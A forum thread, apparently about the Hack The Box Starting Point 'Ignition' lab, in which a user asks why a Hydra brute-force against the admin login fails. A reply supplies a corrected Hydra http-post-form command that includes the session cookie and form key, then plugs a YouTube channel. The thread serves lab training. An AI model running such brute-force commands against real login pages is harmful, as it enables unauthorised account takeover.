Starting Point - Ignition - Task 6 - Using Hydra for Brute-Forcing

Hello everyone,
I completed the Ignition machine of Starting Point but on the task 6, for avoiding manual brute force, I tried also to use Hydra for brute-forcing it but it does not work and I don’t know the reason.

I created a wordlist of 10 strings (called wordlist.txt) where I placed the correct password in the middle.

If I submit the command in the following way:

hydra -l admin -P wordlist.txt -u -f "ignition.htb" -s 80 -V http-form-post '/admin:form_key=L5doLYoTkK8BEEp5&login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:F=<span>Welcome, please sign in</span>'

in output I get “0 valid password found”. Why doesn’t it get the correct password?
I tried also to use other strings after :F= as incorrect or login-form but I get the same output.

Note: form_key changes when it expires (you can check it by submitting manually some credentials and check if you get the message Invalid key. Then refresh and by browser dev tools you can get the current form_key).

Thank you in advance!

hello young sir!

In this case the form also expects the cookie, so you need to provide it accordingly. You can use burp suite to capture the cookie and the form key easily. Once this is done, its important that you have the right syntax for hydra.

hydra -l admin -P ./passwordstest -u "ignition.htb" -s 80 http-post-form "/admin:form_key=xxxxxxxxxxxx&login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:H=Cookie: admin=xxxxxxxxxxxxxx; form_key=xxxxxxxxxxxx:F=Incorrect" -I

hey if you found this useful, i’d appriciate if you visit my YT page. I will be uploading a video about this soon - InfraFort - YouTube